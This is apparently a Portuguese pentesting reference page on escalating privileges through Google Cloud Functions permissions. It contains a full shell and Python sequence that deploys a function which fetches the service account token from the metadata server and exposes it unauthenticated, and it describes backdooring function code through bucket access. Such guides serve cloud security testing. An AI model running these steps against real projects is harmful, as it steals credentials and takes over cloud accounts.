GCP - Cloudfunctions Privesc

cloudfunctions

Mais informações sobre Cloud Functions:

cloudfunctions.functions.create , cloudfunctions.functions.sourceCodeSet, iam.serviceAccounts.actAs

Um atacante com esses privilégios pode criar uma nova Cloud Function com código arbitrário (malicioso) e atribuí-la a uma Service Account. Em seguida, vazar o token da Service Account a partir dos metadados para escalar privilégios para ela. Alguns privilégios para acionar a função podem ser necessários.

Scripts de exploração para este método podem ser encontrados aqui e aqui e o arquivo .zip pré-construído pode ser encontrado aqui.

cloudfunctions.functions.update , cloudfunctions.functions.sourceCodeSet, iam.serviceAccounts.actAs

Um atacante com esses privilégios pode modificar o código de uma Function e até mesmo modificar a service account anexada com o objetivo de exfiltrar o token.

Alguns privilégios extras, como a permissão .call para a versão 1 de cloudfunctions ou o papel role/run.invoker para acionar a função, podem ser necessários.

# Create new code
temp_dir=$(mktemp -d)

cat > $temp_dir/main.py <<EOF
import subprocess

def main(request):
cmd = "curl -s -f -H 'Metadata-Flavor: Google' 'http://metadata/computeMetadata/v1/instance/service-accounts/default/token'"
result = subprocess.check_output(cmd, shell=True, text=True)
return result
EOF

echo "" > $temp_dir/requirements.txt

zip -r $temp_dir/function.zip $temp_dir/main.py $temp_dir/requirements.txt

# Update code
gcloud functions deploy <cloudfunction-name> \
--runtime python312 \
--source $temp_dir \
--entry-point main \
--service-account <sa>@$PROJECT_ID.iam.gserviceaccount.com \
--trigger-http \
--allow-unauthenticated

# Get SA token calling the new function code
gcloud functions call <cloudfunction-name>

O script de exploração para este método pode ser encontrado aqui.

cloudfunctions.functions.sourceCodeSet

Com esta permissão, você pode obter uma URL assinada para poder fazer o upload de um arquivo para um bucket de função (mas o código da função não será alterado, você ainda precisa atualizá-lo)

# Generate the URL
curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions:generateUploadUrl \
-H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
-H "Content-Type: application/json" \
-d '{}'

Não tenho certeza de quão útil apenas esta permissão é do ponto de vista de um atacante, mas é bom saber.

cloudfunctions.functions.setIamPolicy , iam.serviceAccounts.actAs

Dê a si mesmo qualquer um dos privilégios anteriores .update ou .create para escalar.

cloudfunctions.functions.update

Ter apenas permissões de cloudfunctions, sem iam.serviceAccounts.actAs, você não poderá atualizar a função, ENTÃO ISTO NÃO É UM VÁLIDO PRIVESC.

Acesso de Leitura e Escrita sobre o bucket

Se você tiver acesso de leitura e escrita sobre o bucket, pode monitorar mudanças no código e sempre que uma atualização no bucket acontecer, você pode atualizar o novo código com seu próprio código para que a nova versão da Cloud Function seja executada com o código backdoored enviado.

Você pode verificar mais sobre o ataque em:

No entanto, você não pode usar isso para pré-comprometer Cloud Functions de terceiros, porque se você criar o bucket em sua conta e der permissões públicas para que o projeto externo possa escrever sobre ele, você recebe o seguinte erro:

Acesso de Leitura e Escrita sobre o Artifact Registry

Quando uma Cloud Function é criada, uma nova imagem docker é enviada para o Artifact Registry do projeto. Tentei modificar a imagem com uma nova e até mesmo excluir a imagem atual (e a imagem cache), e nada mudou, a cloud function continuou funcionando. Portanto, talvez possa ser possível abusar de um ataque de Condição de Corrida como com o bucket para mudar o contêiner docker que será executado, mas apenas modificar a imagem armazenada não é possível para comprometer a Cloud Function.

Referências

• https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/